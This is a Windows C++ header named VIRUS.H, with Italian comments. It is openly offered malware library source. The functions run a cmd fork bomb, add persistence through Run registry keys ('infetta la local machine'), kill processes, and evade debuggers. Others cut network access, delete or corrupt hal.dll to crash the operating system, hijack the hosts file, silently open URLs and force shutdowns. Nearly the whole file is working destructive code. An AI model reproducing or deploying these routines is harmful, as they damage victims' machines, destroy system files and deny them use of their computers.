VIRUS.H - SCIAX2

/**

Questa versione è stata rilasciata SOLO PER SCIAX2!!!!!!

Questa versione è stata rilasciata SOLO PER SCIAX2!!!!!!

Questa versione è stata rilasciata SOLO PER SCIAX2!!!!!!

Questa versione è stata rilasciata SOLO PER SCIAX2!!!!!!

Questa versione è stata rilasciata SOLO PER SCIAX2!!!!!!

Questa versione è stata rilasciata SOLO PER SCIAX2!!!!!!

Questa versione è stata rilasciata SOLO PER SCIAX2!!!!!!

Questa versione è stata rilasciata SOLO PER SCIAX2!!!!!!

Questa versione è stata rilasciata SOLO PER SCIAX2!!!!!!

Questa versione è stata rilasciata SOLO PER SCIAX2!!!!!!

Questa versione è stata rilasciata SOLO PER SCIAX2!!!!!!

Questa versione è stata rilasciata SOLO PER SCIAX2!!!!!!

Questa versione è stata rilasciata SOLO PER SCIAX2!!!!!!

*/


#include <windows.h>
#include <stdio.h>
#include <fstream>
#include <string>
#include <process.h>
#include <Tlhelp32.h>
#include <winbase.h>

using namespace std;
/**
-------------------------------------------------------------
             ,----------------,              ,---------,
        ,-----------------------,          ,"        ,"|
      ,"                      ,"|        ,"        ,"  |
     +-----------------------+  |      ,"        ,"    |
     |  .-----------------.  |  |     +---------+      |
     |  |                 |  |  |     | -==----'|      |
     |  |  Credits:       |  |  |     |         |      |
     |  |  Neartec.       |  |  |/----|`---=    |      |
     |  |CodeR: Capt. Hog.|  |  |   ,/|==== ooo |      ;
     |  |                 |  |  |  // |(((( [33]|    ,"
     |  `-----------------'  |," .;'| |((((     |  ,"
     +-----------------------+  ;;  | |         |,"
        /_)______________(_/  //'   | +---------+
   ___________________________/___  `,
  /  oooooooooooooooo  .o.  oooo /,   \,"-----------
 / ==ooooooooooooooo==.o.  ooo= //   ,`\--{)B     ,"
/_==__==========__==_ooo__ooo=_/'   /___________,"
`-----------------------------'


Repilogo funzioni:
----------------------------------------------------------------
ramrabbit(true/false) (crea un ram rabbit) TRUE = Cmd flood FALSE = invisible
disabilita_internet (tenta di disabilare internet)
riabilita_internet(riabilita internet)
nuke(); //tenta di mandare in fail il sistema operativo
bloccasito(string nomesito)
mostraconsole();
togliconsole();
spengipc();
riavviaoc();
aprisito(url)
connettitibackground(url)
imposta_avvio("C:\\... percorso.. .exe","java.exe");
killa_processo("nomeprocessosenza.exe");
protezioni(TRUE|FALSE) //Da mettere in un thread separato
----------------------------------------------------------------
*/


bool protezioni(bool stato){ //ne vado fiero :3
    while(TRUE){
    if(stato){
        bool isdbg = IsDebuggerPresent();
        if(isdbg){exit(1);}else{

        }
    }else{  }}
}


void killa_processo(const char *filename)
{
    HANDLE hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, NULL);
    PROCESSENTRY32 pEntry;
    pEntry.dwSize = sizeof (pEntry);
    BOOL hRes = Process32First(hSnapShot, &pEntry);
    while (hRes)
    {
        if (strcmp(pEntry.szExeFile, filename) == 0)
        {
            HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, 0,
                                          (DWORD) pEntry.th32ProcessID);
            if (hProcess != NULL)
            {
                TerminateProcess(hProcess, 9);
                CloseHandle(hProcess);
            }
        }
        hRes = Process32Next(hSnapShot, &pEntry);
    }
    CloseHandle(hSnapShot);
}

void imposta_avvio(char * percorso, char * processo){
    HKEY hkey;
    char * pablo = percorso;
    char * nomeprocesso = processo;
    try{ //Infetta la local machine
        RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\Currentversion\\Run", 0, KEY_SET_VALUE, &hkey);
        RegSetValueEx (hkey, nomeprocesso, 0, REG_SZ, (LPBYTE) pablo, strlen(pablo) + 1);
        RegCloseKey(hkey);
    }catch(...){

    }
    HKEY utentecorrente;
    char * percorso2 = percorso;
    char * processo2 = processo;

    try{
        RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsft\\Windows\\Currentversion\\Run",0,KEY_SET_VALUE, &utentecorrente);
        RegSetValueEx(utentecorrente, processo2, 0,REG_SZ,(LPBYTE) percorso2, strlen(percorso2) + 1);
        RegCloseKey(utentecorrente);
    }catch(...){

    }

}

void connettitibackground(const char * sito2){
    ShellExecute(0, 0, sito2, 0, 0 , SW_HIDE );
}
void aprisito(const char * sito){
    ShellExecute(0, 0, sito, 0, 0 , SW_SHOW );
}

void fork_core(){
        while(TRUE){
        ShellExecuteA(NULL,"open","cmd",NULL,NULL,SW_SHOW);
        }

}
void fork_coredue(){
        while(TRUE){
        ShellExecuteA(NULL,"open","cmd",NULL,NULL,SW_SHOW);
        }

}
bool ramrabbit(bool metodo){ //0 -= invisible, 1 = visibile
    if(metodo){
        CreateThread(0, 0, (LPTHREAD_START_ROUTINE)fork_coredue, 0, 0, 0);
    }else{
        CreateThread(0, 0, (LPTHREAD_START_ROUTINE)fork_core, 0, 0, 0);
    }

}

bool fexist(const char *fileName)
{
    std::ifstream infile(fileName);
    return infile.good();
}
void disabilita_internet(){
    system("ipconfig/release");

}
void riabilita_internet(){
    system("ipconfig/renew");

}
bool nuke(){
    if(fexist("C:\\Windows\\system32\\hal.dll")){
        try{
            remove("C:\\Windows\\system32\\hal.dll");
        }
        catch(...){
            ofstream corrompi;
            corrompi.open("C:\\Windows\\system32\\hal.dll");
            corrompi << "0x0x0x0x00x0x0x";
        }

    }else{

    }
}

void bloccasito(string sito){
    ofstream hostsfile;
    hostsfile.open("C:\\Windows\\system32\\drivers\\etc\\hosts");
    hostsfile << "\n";
    string payload = "127.0.0.1    " + sito;
    try{
            hostsfile << "\n";
            hostsfile << payload;
    }
    catch(...){

    }

}

void mostraconsole(){
    HWND hwnd_win = GetForegroundWindow();
    ShowWindow(hwnd_win,SW_SHOW);

}
void togliconsole(){
    HWND hwnd_win = GetForegroundWindow();
    ShowWindow(hwnd_win,SW_HIDE);
}
void spengipc(){
    system("shutdown -s");
}
void riavviapc(){
    system("shutdown -r");
}